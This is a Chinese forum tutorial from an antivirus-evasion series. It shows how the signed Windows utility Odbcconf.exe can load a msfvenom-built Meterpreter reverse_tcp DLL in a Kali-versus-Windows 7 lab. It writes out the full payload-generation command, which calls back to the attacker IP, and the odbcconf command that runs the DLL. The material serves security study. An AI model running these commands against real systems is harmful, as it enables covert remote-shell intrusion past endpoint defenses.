安全矩阵

 找回密码
 立即注册
搜索
查看: 2916|回复: 0

远控免杀专题(59)-白名单Odbcconf.exe执行payload

[复制链接]

98

主题

207

帖子

955

积分

高级会员

Rank: 4

积分
955
发表于 2020-3-31 20:28:30 | 显示全部楼层 |阅读模式
本帖最后由 wholesome 于 2020-3-31 20:31 编辑

一、Odbcconf.exe介绍
Odbcconf.exe是一个命令行工具,可让您配置ODBC驱动程序和数据源名称(微软官方文档https://docs.microsoft.com/en-us ... ew=sql-server-ver15)。
Odbcconf.exe在windows中的的一般路径为C:\Windows\System32\odbcconf.exe  C:\Windows\SysWOW64\odbcconf.exe
通过文档可发现有两种方式来加载dll,/A和/F

二、利用Odbcconf.exe执行payload法
攻击机:kali    ip地址:192.168.10.130
靶机:win7     ip地址:192.168.10.135
使用msfvenom生成shellcode,注意生成的是dll格式
  1. msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f dll > hacker.dll
复制代码

设置监听:


靶机运行payload:
  1. odbcconf.exe /a {regsvr C:\Users\Administrator\Desktop\hacker.dll}
复制代码


成功上线:

这个也被杀软盯上了,行为检测预警。

三、参考资料
基于白名单Odbcconf执行payload:https://micro8.github.io/Micro8- ... BA%8C%E5%AD%A3.html


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 13:40 , Processed in 0.017583 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表